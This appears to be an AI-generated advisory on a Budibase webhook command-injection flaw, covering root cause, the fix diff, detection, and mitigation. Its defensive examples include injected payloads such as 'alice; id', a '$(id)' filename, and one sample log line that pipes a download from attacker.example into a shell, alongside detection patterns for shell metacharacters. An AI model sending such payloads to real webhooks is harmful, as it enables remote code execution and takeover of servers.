CVE-2026-35216 Overview
CVE-2026-35216 is a critical Remote Code Execution (RCE) vulnerability in Budibase, an open-source low-code platform for building business applications. Prior to version 3.33.4, an unauthenticated attacker can achieve Remote Code Execution on the Budibase server by triggering an automation that contains a Bash step via the public webhook endpoint. This vulnerability is classified as CWE-78 (OS Command Injection).
Critical Impact
Unauthenticated attackers can execute arbitrary commands as root inside the Budibase container, potentially leading to complete compromise of the container, data exfiltration, and lateral movement within the network.
Affected Products
- Budibase versions prior to 3.33.4
- Budibase instances with automations containing Bash steps exposed via public webhooks
- Self-hosted and cloud deployments running vulnerable versions
Discovery Timeline
- 2026-04-03 - CVE-2026-35216 published to NVD
- 2026-04-08 - Last updated in NVD database
Technical Details for CVE-2026-35216
Vulnerability Analysis
The vulnerability exists in Budibase's automation system, specifically in how the Bash automation step built its command. Automations can be triggered through public webhook endpoints, which are reachable without authentication by design. When such an automation contained a Bash step whose command string included template bindings (for example, values taken from the webhook body), the bound values were rendered into the command string and handed to a shell without validation, so a caller who controls the webhook payload could inject arbitrary shell commands on the underlying server.
The attack is particularly severe because the automation runs as root inside the container, granting the attacker full privileges within that containerized environment. This enables container escape attempts, access to sensitive configuration data such as environment variables and secrets, and pivoting to other services or systems reachable from the compromised container.
Root Cause
The root cause is improper input validation in the Bash automation step handler. The vulnerable code used execSync from the Node.js child_process module, which runs its argument through a shell, and allowed template bindings directly within the command string. Any shell metacharacters in a bound value (such as ;, |, && or $( )) were therefore interpreted by the shell, so a malicious webhook payload was processed and executed without sanitization.
The fix introduced several key changes: replacing execSync with execa, which spawns the program with an argument list rather than through a shell; validation that rejects command bindings (Handlebars template expressions) in the command field; and a requirement that dynamic values be passed through a validated args field that must be a JSON array of strings.
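The following is an added example, not Budibase's own code, that contrasts the vulnerable shape (bindings rendered into a shell command string) with a hardened shape modelled on the fix (no bindings allowed in the command, dynamic values only through a validated args array, result handed to a no-shell spawn). The binding syntax, the "trigger.body.<key>" lookup and the single-program command field are simplified assumptions for this example.

```typescript
// Added example: vulnerable vs hardened Bash-step handling. Not Budibase code.
type WebhookBody = Record<string, string>;

interface PlannedExec {
  file: string;   // program to spawn; never interpreted by a shell
  args: string[]; // one argv element per value; metacharacters stay literal
}

// Stand-in for findHBSBlocks (assumption): every {{ ... }} block in a string.
function findBindingBlocks(input: string): string[] {
  return input.match(/\{\{[^}]*\}\}/g) ?? [];
}

// Resolve {{ trigger.body.<key> }} against the webhook payload (simplified).
function resolveBindings(template: string, body: WebhookBody): string {
  return template.replace(/\{\{\s*trigger\.body\.(\w+)\s*\}\}/g,
    (_match: string, key: string) => body[key] ?? "");
}

// VULNERABLE (pre-fix shape): the rendered string is what execSync would hand
// to /bin/sh, so a payload value like "alice; id" becomes two commands.
function buildVulnerableCommand(commandTemplate: string, body: WebhookBody): string {
  return resolveBindings(commandTemplate, body);
}

// HARDENED (post-fix shape): reject bindings in the command, validate args.
function planHardenedExec(command: string, rawArgs: unknown, body: WebhookBody): PlannedExec {
  if (findBindingBlocks(command).length > 0) {
    throw new Error("Command bindings are not supported. Use the args field for dynamic values.");
  }
  let args: unknown = rawArgs ?? [];
  if (typeof args === "string") { // args may arrive as JSON text from an editor field
    try {
      args = JSON.parse(args);
    } catch {
      throw new Error("Args must be a JSON array of strings.");
    }
  }
  if (!Array.isArray(args) || args.some((a) => typeof a !== "string")) {
    throw new Error("Args must be a JSON array of strings.");
  }
  // Bindings are resolved per element; each value stays a single argv entry.
  return { file: command, args: (args as string[]).map((a) => resolveBindings(a, body)) };
}

// Hostile payload constructed for the example.
const hostilePayload: WebhookBody = { name: "alice; id" };

console.log(buildVulnerableCommand("echo {{ trigger.body.name }}", hostilePayload));
// shell would run: echo alice; id
console.log(planHardenedExec("echo", '["{{ trigger.body.name }}"]', hostilePayload));
// { file: "echo", args: ["alice; id"] } -> echo prints the literal text
```

The PlannedExec returned by the hardened path is what you would pass to execa or child_process.execFile, which spawn the program directly; because there is no shell, "alice; id" is delivered to echo as one argument and printed literally.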
Attack Vector
The attack exploits the public webhook endpoint functionality in Budibase. An attacker identifies a Budibase instance with a publicly accessible webhook that triggers an automation containing a Bash step. By crafting a malicious webhook request with command injection payloads embedded in template bindings, the attacker can execute arbitrary shell commands on the server.
The attack vector is network-based and requires no authentication. Exploitation complexity is elevated, however, because the attacker must find an instance that already exposes a webhook-triggered automation containing a Bash step whose command binds webhook data; creating such an automation would require authenticated builder access.
// Diff of the Bash step handler: lines marked - are the vulnerable code before the fix, lines marked + are the fix
-import { execSync } from "child_process"
-import { processStringSync } from "@budibase/string-templates"
+import execa from "execa"
+import { findHBSBlocks, processStringSync } from "@budibase/string-templates"
import * as automationUtils from "../automationUtils"
import environment from "../../environment"
import { BashStepInputs, BashStepOutputs } from "@budibase/types"
+const INVALID_INPUTS = "Budibase bash automation failed: Invalid inputs"
+const COMMAND_BINDINGS_ERROR =
+ "Budibase bash automation failed: Command bindings are not supported. Use the args field for dynamic values."
+const ARGS_VALIDATION_ERROR =
+ "Budibase bash automation failed: Args must be a JSON array of strings."
+
+interface JsonEditorInput {
+ value?: unknown
+}
+
+const validateArgs = (args: unknown): string[] => {
+ if (!Array.isArray(args) || args.some(arg => typeof arg !== "string")) {
+ throw new Error(ARGS_VALIDATION_ERROR)
+ }
+
+ return args
+}
+
+const parseArgs = (args: unknown) => {
+ if (args == null) {
+ return []
+ }
Source: GitHub Commit f0c731b
Detection Methods for CVE-2026-35216
Indicators of Compromise
- Unexpected outbound network connections originating from Budibase container processes
- Unusual process spawning activity within Budibase containers, particularly shell commands not typical of normal operation
- Webhook access logs showing suspicious payloads containing shell metacharacters or command sequences
- Modifications to container filesystem or unexpected file creation in temporary directories
Detection Strategies
- Monitor webhook endpoint access patterns for unusual request frequencies or payloads containing common command injection patterns (;, |, &&, $(), backticks)
- Implement application-level logging to capture automation trigger events and Bash step executions
- Deploy runtime container security solutions to detect anomalous process execution within Budibase containers
- Review automation configurations for Bash steps connected to public webhooks
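The following is an added example, not Budibase's own code, of the second detection strategy above: scanning webhook access-log entries for command-injection indicators in the request body. The JSON-lines log shape, the field names and the sample entries are constructed assumptions for this example; adapt the parser to your proxy or application log format.

```typescript
// Added example: flag webhook request bodies carrying shell metacharacters or
// Handlebars bindings. Log format and sample lines are constructed, not Budibase's.
interface WebhookLogEntry { ts: string; src: string; path: string; body: unknown }
interface Hit { field: string; value: string; reasons: string[] }
interface Finding extends Hit { ts: string; src: string; path: string }

// Indicator classes; a value can match several.
const INDICATORS: Array<[string, RegExp]> = [
  ["command-separator", /[;&|\n]/],
  ["command-substitution", /\$\(|`/],
  ["redirection", /[<>]/],
  ["handlebars-binding", /\{\{[^}]*\}\}/],
];

function inspectValue(value: string): string[] {
  return INDICATORS.filter(([, re]) => re.test(value)).map(([name]) => name);
}

// Walk nested objects and arrays so an indicator buried in a sub-field is found.
function walk(node: unknown, field: string, out: Hit[]): void {
  if (typeof node === "string") {
    const reasons = inspectValue(node);
    if (reasons.length > 0) out.push({ field, value: node, reasons });
  } else if (Array.isArray(node)) {
    node.forEach((v, i) => walk(v, `${field}[${i}]`, out));
  } else if (node !== null && typeof node === "object") {
    for (const [k, v] of Object.entries(node as Record<string, unknown>)) {
      walk(v, `${field}.${k}`, out);
    }
  }
}

// Only webhook trigger requests are inspected; malformed lines are skipped.
function scanWebhookLog(lines: string[]): Finding[] {
  const findings: Finding[] = [];
  for (const line of lines) {
    let entry: WebhookLogEntry;
    try {
      entry = JSON.parse(line) as WebhookLogEntry;
    } catch {
      continue;
    }
    if (typeof entry.path !== "string" || !entry.path.includes("/webhooks")) continue;
    const hits: Hit[] = [];
    walk(entry.body, "body", hits);
    for (const hit of hits) {
      findings.push({ ts: entry.ts, src: entry.src, path: entry.path, ...hit });
    }
  }
  return findings;
}

// Constructed sample log: one benign trigger, two hostile ones, one non-webhook
// request that must be ignored, and one malformed line.
const SAMPLE_LOG: string[] = [
  '{"ts":"2026-04-04T10:00:01Z","src":"10.1.2.3","path":"/api/public/v1/webhooks/abc123","body":{"name":"alice","count":"3"}}',
  '{"ts":"2026-04-04T10:00:07Z","src":"198.51.100.7","path":"/api/public/v1/webhooks/abc123","body":{"name":"alice; curl http://attacker.example/x | sh"}}',
  '{"ts":"2026-04-04T10:00:09Z","src":"198.51.100.7","path":"/api/public/v1/webhooks/abc123","body":{"report":{"filename":"$(id).txt"}}}',
  '{"ts":"2026-04-04T10:00:12Z","src":"10.1.2.9","path":"/api/applications","body":{"q":"a; b"}}',
  'garbage line that is not JSON',
];

for (const f of scanWebhookLog(SAMPLE_LOG)) {
  console.log(`${f.ts} ${f.src} ${f.path} ${f.field}=${JSON.stringify(f.value)} [${f.reasons.join(",")}]`);
}
```

These patterns are deliberately broad and will fire on legitimate values that contain & or > (URLs, HTML fragments), so treat a hit as a triage signal to correlate with process-spawn telemetry from the container, not as a verdict on its own; narrow the path filter to the webhook IDs of automations that actually contain a Bash step once you have audited them.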
Monitoring Recommendations
- Enable verbose logging for Budibase automation executions and webhook triggers
- Configure alerts for process execution anomalies within containerized environments
- Implement network traffic analysis to detect potential data exfiltration attempts from Budibase infrastructure
- Regularly audit public webhook configurations and their associated automation workflows
How to Mitigate CVE-2026-35216
Immediate Actions Required
- Upgrade Budibase to version 3.33.4 or later immediately
- Audit all existing automations for Bash steps connected to public webhooks and disable or restrict access pending upgrade
- Review webhook access logs for signs of exploitation attempts
- Implement network segmentation to limit potential lateral movement if exploitation has occurred
Patch Information
Budibase has released version 3.33.4 which addresses this vulnerability. The fix implements several security improvements to the Bash automation step:
- Replaced execSync with execa for safer command execution
- Added validation to reject Handlebars template bindings in the command field
- Implemented strict argument validation requiring JSON array of strings format
- Modified the automation processing to skip template processing for Bash steps, allowing the step to handle its own templating securely
Apply the patch by updating to version 3.33.4 or later. For details, see the GitHub Security Advisory GHSA-fcm4-4pj2-m5hf and the GitHub Pull Request #18238.
Workarounds
- Disable all public webhooks that trigger automations containing Bash steps until the patch can be applied
- Implement web application firewall (WAF) rules to filter requests containing shell metacharacters targeting webhook endpoints
- Restrict network access to Budibase webhook endpoints using firewall rules or reverse proxy configurations
- Run Budibase containers with non-root users where possible to limit the impact of potential exploitation
# Example: Restrict webhook access via nginx
# Confirm the webhook trigger path against your deployment's access logs before applying
location /api/public/v1/webhooks {
    # Temporarily deny all external access to webhooks
    deny all;
    # Or restrict to trusted IP ranges only (allow rules must precede the final deny)
    # allow 10.0.0.0/8;
    # deny all;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.